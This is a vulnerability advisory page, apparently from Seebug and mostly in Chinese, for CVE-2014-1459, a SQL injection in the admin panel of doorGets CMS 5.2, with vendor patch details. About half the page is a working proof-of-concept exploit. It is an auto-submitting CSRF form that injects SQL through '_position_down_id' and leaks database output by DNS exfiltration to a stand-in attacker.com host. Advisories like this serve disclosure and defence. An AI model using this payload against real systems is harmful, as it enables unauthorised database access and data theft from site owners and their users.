doorGets CMS SQL注入漏洞

2014-02-0800:00:00

Root

www.seebug.org

EPSS

0.002

Percentile

52.9%

JSON

CVE ID:CVE-2014-1459

doorGets CMS是一款内容管理系统。

由于传递到"/dg-admin/index.php"脚本的"_position_down_id" HTTP POST参数未能充分过滤，攻击者可以通过访问管理界面在应用程序的数据库中执行任意SQL命令。
0
doorGets CMS 5.2
厂商补丁：

doorGets CMS

更新至2014年1月15日之后发布的5.2版本:
http://www.doorgets.com


                                                The following exploitation example is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will use a CSRF vector to send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of &quot;.attacker.com&quot; (a domain name, DNS server of which is controlled by the attacker):
&lt;form action=&quot;http://[host]/dg-admin/?controller=rubriques&quot; method=&quot;post&quot; name=&quot;main&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;_position_down_id&quot; value=&quot;1 AND 1=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHA R(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114 )))) -- &quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;_position_down_position&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;_position_down_submit&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;_position_down_type&quot; value=&quot;down&quot;&gt;
&lt;input type=&quot;submit&quot; id=&quot;btn&quot;&gt;
&lt;/form&gt;
&lt;script&gt;
document.getElementById('btn').click();
&lt;/script&gt;

EPSS

0.002

Percentile

52.9%

JSON

Related for SSV:61393